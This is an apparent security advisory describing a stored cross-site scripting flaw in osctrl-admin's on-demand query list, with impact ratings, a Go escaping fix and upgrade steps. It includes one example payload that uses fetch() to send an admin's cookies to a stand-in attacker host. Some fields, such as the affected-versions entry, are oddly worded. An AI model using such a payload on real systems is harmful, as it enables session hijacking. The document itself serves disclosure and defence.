CVE-2026-28280: Stored Cross-Site Scripting (XSS) in osctrl-admin On-Demand Query List

Source: Dev.to

Vulnerability Overview

• Vulnerability ID: CVE-2026-28280
• CWE ID: CWE‑79 (Improper Neutralization of Input During Web Page Generation)
• CVSS v3.1 Base Score: 6.1 (Medium)
• EPSS Score: 0.00023
• Published: 2026‑02‑28
• Attack Vector: Network

A stored cross‑site scripting (XSS) vulnerability exists in the osctrl‑admin component of osctrl versions prior to 0.5.0. Authenticated users with low‑level query permissions can inject malicious JavaScript via the on‑demand query interface. The payload is stored in the backend database and rendered without proper context‑aware encoding in the administrative dashboard. When an administrator views the query history, the script executes, potentially leading to session hijacking or privilege escalation.

Affected Versions

• osctrl‑admin: Allows injection of HTML tags or other executable JavaScript payloads.

Example of a malicious payload

fetch('https://attacker.example.com/steal?c='+document.cookie)

If saved as a query, the payload is stored unchanged and later executed in the admin’s browser when the query list is viewed.

Mitigation in the source code

The fix introduces context‑aware output encoding for the query display. A simplified excerpt of the change:

// Before (vulnerable)
fmt.Fprintf(w, "%s", query.Text)

// After (patched)
escaped := html.EscapeString(query.Text) // proper HTML escaping
fmt.Fprintf(w, "%s", escaped)

Impact

• Confidentiality: High – attacker can steal session cookies or other sensitive data.
• Integrity: High – attacker can manipulate the admin interface or inject further malicious content.
• Availability: Low – the vulnerability does not directly affect service uptime.

Exploitability

• Exploit Status: Proof‑of‑Concept (PoC) available.
• Low‑privilege authenticated users can trigger the vulnerability without requiring additional privileges.

Remediation

1. Upgrade to osctrl v0.5.0 or later.
2. Pull the latest Docker images or binaries for osctrl v0.5.0 and redeploy the osctrl-admin service.
3. Verify the fix by attempting to save a query containing HTML tags (e.g., **test**). The tags should be rendered as literal text, not interpreted as HTML.

Additional hardening recommendations

• Apply input validation on all user‑supplied data.
• Enforce output encoding for any data rendered in HTML contexts.
• Follow the principle of least privilege: restrict the query permission to only those users who truly need it.

References

• GitHub Advisory: GHSA‑4rv8‑5cmm‑2r22
• NVD Entry: Vulnerability details and analysis (link to NVD)
• Vendor Advisory: (link to vendor advisory)
• Full report for CVE‑2026‑28280 (available on the vendor’s website)